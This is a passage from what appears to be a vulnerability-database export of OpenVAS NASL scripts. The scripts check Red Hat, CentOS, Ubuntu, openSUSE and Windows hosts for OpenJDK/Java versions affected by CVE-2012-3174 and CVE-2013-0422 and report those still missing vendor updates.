rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-debuginfo\", rpm:\"java-1.7.0-openjdk-debuginfo~1.7.0.9~2.3.4.el5_9.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-demo\", rpm:\"java-1.7.0-openjdk-demo~1.7.0.9~2.3.4.el5_9.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-devel\", rpm:\"java-1.7.0-openjdk-devel~1.7.0.9~2.3.4.el5_9.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-javadoc\", rpm:\"java-1.7.0-openjdk-javadoc~1.7.0.9~2.3.4.el5_9.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-src\", rpm:\"java-1.7.0-openjdk-src~1.7.0.9~2.3.4.el5_9.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:37:51", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2013-01-21T00:00:00", "type": "openvas", "title": "Ubuntu Update for openjdk-7 USN-1693-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310841283", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841283", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1693_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for openjdk-7 USN-1693-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1693-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.841283\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-21 09:50:59 +0530 (Mon, 21 Jan 2013)\");\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"USN\", value:\"1693-1\");\n script_name(\"Ubuntu Update for openjdk-7 USN-1693-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openjdk-7'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.10\");\n script_tag(name:\"affected\", value:\"openjdk-7 on Ubuntu 12.10\");\n script_tag(name:\"insight\", value:\"It was discovered that OpenJDK 7's security mechanism could be bypassed via\n Java applets. If a user were tricked into opening a malicious website, a\n remote attacker could exploit this to perform arbitrary code execution as\n the user invoking the program.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"icedtea-7-jre-cacao\", ver:\"7u9-2.3.4-0ubuntu1.12.10.1\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"icedtea-7-jre-jamvm\", ver:\"7u9-2.3.4-0ubuntu1.12.10.1\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-7-jre\", ver:\"7u9-2.3.4-0ubuntu1.12.10.1\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-7-jre-headless\", ver:\"7u9-2.3.4-0ubuntu1.12.10.1\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-7-jre-lib\", ver:\"7u9-2.3.4-0ubuntu1.12.10.1\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-7-jre-zero\", ver:\"7u9-2.3.4-0ubuntu1.12.10.1\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:41:01", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2013-03-11T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for java-1_7_0-openjdk (openSUSE-SU-2013:0199-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310850427", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850427", "sourceData": "# Copyright (C) 2013 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2013-01/msg00025.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.850427\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2013-03-11 18:29:19 +0530 (Mon, 11 Mar 2013)\");\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"openSUSE-SU\", value:\"2013:0199-1\");\n script_name(\"openSUSE: Security Advisory for java-1_7_0-openjdk (openSUSE-SU-2013:0199-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'java-1_7_0-openjdk'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE12\\.2\");\n\n script_tag(name:\"affected\", value:\"java-1_7_0-openjdk on openSUSE 12.2\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"insight\", value:\"java-1_7_0-openjdk was updated to icedtea-2.3.4 fixing bugs\n and also severe security issues:\n\n * Security fixes\n\n - S8004933, CVE-2012-3174: Improve MethodHandle\n interaction with libraries\n\n - S8006017, CVE-2013-0422: Improve lookup resolutions\n\n - S8006125: Update MethodHandles library interactions\n\n * Bug fixes\n\n - S7197906: BlockOffsetArray::power_to_cards_back() needs\n to handle &> 32 bit shifts\n\n - G422525: Fix building with PaX enabled kernels.\n\n - use gpg-offline to check the validity of icedtea tarball\n\n - use jamvm on %arm\n\n - use icedtea package name instead of protected openjdk for\n jamvm builds\n\n - fix armv5 build\n\n - update to java access bridge 1.26.2\n\n * bugfix release, mainly 64bit JNI and JVM support\n\n - fix a segfault in AWT code - (bnc#792951)\n\n * add openjdk-7-src-b147-awt-crasher.patch\n\n - turn pulseaudio off on pre 11.4 distros\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE12.2\") {\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk\", rpm:\"java-1_7_0-openjdk~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-debuginfo\", rpm:\"java-1_7_0-openjdk-debuginfo~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-debugsource\", rpm:\"java-1_7_0-openjdk-debugsource~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-demo\", rpm:\"java-1_7_0-openjdk-demo~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-demo-debuginfo\", rpm:\"java-1_7_0-openjdk-demo-debuginfo~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-devel\", rpm:\"java-1_7_0-openjdk-devel~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-devel-debuginfo\", rpm:\"java-1_7_0-openjdk-devel-debuginfo~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-javadoc\", rpm:\"java-1_7_0-openjdk-javadoc~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-src\", rpm:\"java-1_7_0-openjdk-src~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:11", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2013-01-21T00:00:00", "type": "openvas", "title": "CentOS Update for java CESA-2013:0165 centos5", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310881557", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881557", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for java CESA-2013:0165 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2013-January/019203.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881557\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-21 09:37:56 +0530 (Mon, 21 Jan 2013)\");\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"CESA\", value:\"2013:0165\");\n script_name(\"CentOS Update for java CESA-2013:0165 centos5\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'java'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n script_tag(name:\"affected\", value:\"java on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"These packages provide the OpenJDK 7 Java Runtime Environment and the\n OpenJDK 7 Software Development Kit.\n\n Two improper permission check issues were discovered in the reflection API\n in OpenJDK. An untrusted Java application or applet could use these flaws\n to bypass Java sandbox restrictions. (CVE-2012-3174, CVE-2013-0422)\n\n This erratum also upgrades the OpenJDK package to IcedTea7 2.3.4. Refer to\n the NEWS file, linked to in the References, for further information.\n\n All users of java-1.7.0-openjdk are advised to upgrade to these updated\n packages, which resolve these issues. All running instances of OpenJDK Java\n must be restarted for the update to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.9~2.3.4.el5_9.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-demo\", rpm:\"java-1.7.0-openjdk-demo~1.7.0.9~2.3.4.el5_9.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-devel\", rpm:\"java-1.7.0-openjdk-devel~1.7.0.9~2.3.4.el5_9.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-javadoc\", rpm:\"java-1.7.0-openjdk-javadoc~1.7.0.9~2.3.4.el5_9.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-src\", rpm:\"java-1.7.0-openjdk-src~1.7.0.9~2.3.4.el5_9.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:56", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2013-01-21T00:00:00", "type": "openvas", "title": "RedHat Update for java-1.7.0-openjdk RHSA-2013:0165-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2018-11-23T00:00:00", "id": "OPENVAS:1361412562310870889", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870889", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for java-1.7.0-openjdk RHSA-2013:0165-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2013-January/msg00036.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870889\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-21 09:36:09 +0530 (Mon, 21 Jan 2013)\");\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"RHSA\", value:\"2013:0165-01\");\n script_name(\"RedHat Update for java-1.7.0-openjdk RHSA-2013:0165-01\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'java-1.7.0-openjdk'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_(6|5)\");\n script_tag(name:\"affected\", value:\"java-1.7.0-openjdk on Red Hat Enterprise Linux (v. 5 server),\n Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"These packages provide the OpenJDK 7 Java Runtime Environment and the\n OpenJDK 7 Software Development Kit.\n\n Two improper permission check issues were discovered in the reflection API\n in OpenJDK. An untrusted Java application or applet could use these flaws\n to bypass Java sandbox restrictions. (CVE-2012-3174, CVE-2013-0422)\n\n This erratum also upgrades the OpenJDK package to IcedTea7 2.3.4. Refer to\n the NEWS file, linked to in the References, for further information.\n\n All users of java-1.7.0-openjdk are advised to upgrade to these updated\n packages, which resolve these issues. All running instances of OpenJDK Java\n must be restarted for the update to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.9~2.3.4.1.el6_3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-debuginfo\", rpm:\"java-1.7.0-openjdk-debuginfo~1.7.0.9~2.3.4.1.el6_3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-devel\", rpm:\"java-1.7.0-openjdk-devel~1.7.0.9~2.3.4.1.el6_3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.9~2.3.4.el5_9.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-debuginfo\", rpm:\"java-1.7.0-openjdk-debuginfo~1.7.0.9~2.3.4.el5_9.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-demo\", rpm:\"java-1.7.0-openjdk-demo~1.7.0.9~2.3.4.el5_9.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-devel\", rpm:\"java-1.7.0-openjdk-devel~1.7.0.9~2.3.4.el5_9.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-javadoc\", rpm:\"java-1.7.0-openjdk-javadoc~1.7.0.9~2.3.4.el5_9.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-src\", rpm:\"java-1.7.0-openjdk-src~1.7.0.9~2.3.4.el5_9.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-23T19:06:09", "description": "This host is installed with Oracle Java SE and is prone to multiple\n code execution vulnerabilities.", "cvss3": {}, "published": "2013-01-17T00:00:00", "type": "openvas", "title": "Oracle Java SE Multiple Remote Code Execution Vulnerabilities (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2020-04-21T00:00:00", "id": "OPENVAS:1361412562310803156", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803156", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle Java SE Multiple Remote Code Execution Vulnerabilities (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803156\");\n script_version(\"2020-04-21T11:03:03+0000\");\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_bugtraq_id(57246, 57312);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-04-21 11:03:03 +0000 (Tue, 21 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2013-01-17 12:41:59 +0530 (Thu, 17 Jan 2013)\");\n script_name(\"Oracle Java SE Multiple Remote Code Execution Vulnerabilities (Windows)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/51820/\");\n script_xref(name:\"URL\", value:\"http://securitytracker.com/id?1027972\");\n script_xref(name:\"URL\", value:\"http://www.kb.cert.org/vuls/id/625617\");\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/java/javase/7u11-relnotes-1896856.html\");\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_java_prdts_detect_portable_win.nasl\");\n script_mandatory_keys(\"Sun/Java/JRE/Win/Ver\");\n script_tag(name:\"impact\", value:\"Successful exploitation allows remote attackers to execute arbitrary code\n via unspecified vectors.\");\n script_tag(name:\"affected\", value:\"Oracle Java version 7 before Update 11 on windows\");\n script_tag(name:\"solution\", value:\"Upgrade to Oracle Java 7 Update 11 or later.\");\n script_tag(name:\"summary\", value:\"This host is installed with Oracle Java SE and is prone to multiple\n code execution vulnerabilities.\");\n script_tag(name:\"insight\", value:\"- An error in Java Management Extensions (JMX) MBean components which allows\n remote attackers to execute arbitrary code via unspecified vectors.\n\n - An unspecified error exists within the Libraries subcomponent.\n\n NOTE: The vendor reports that only version 7.x is affected. However,\n some security researchers indicate that some 6.x versions may\n be affected\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\njreVer = get_kb_item(\"Sun/Java/JRE/Win/Ver\");\n\nif(jreVer)\n{\n if(version_in_range(version:jreVer, test_version:\"1.7\", test_version2:\"1.7.0.10\")){\n report = report_fixed_ver(installed_version:jreVer, vulnerable_range:\"1.7 - 1.7.0.10\");\n security_message(port: 0, data: report);\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-12-04T11:22:07", "description": "Check for the Version of openjdk-7", "cvss3": {}, "published": "2013-01-21T00:00:00", "type": "openvas", "title": "Ubuntu Update for openjdk-7 USN-1693-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2017-12-01T00:00:00", "id": "OPENVAS:841283", "href": "http://plugins.openvas.org/nasl.php?oid=841283", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1693_1.nasl 7958 2017-12-01 06:47:47Z santu $\n#\n# Ubuntu Update for openjdk-7 USN-1693-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"openjdk-7 on Ubuntu 12.10\";\ntag_insight = \"It was discovered that OpenJDK 7's security mechanism could be bypassed via\n Java applets. If a user were tricked into opening a malicious website, a\n remote attacker could exploit this to perform arbitrary code execution as\n the user invoking the program.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1693-1/\");\n script_id(841283);\n script_version(\"$Revision: 7958 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 07:47:47 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-21 09:50:59 +0530 (Mon, 21 Jan 2013)\");\n 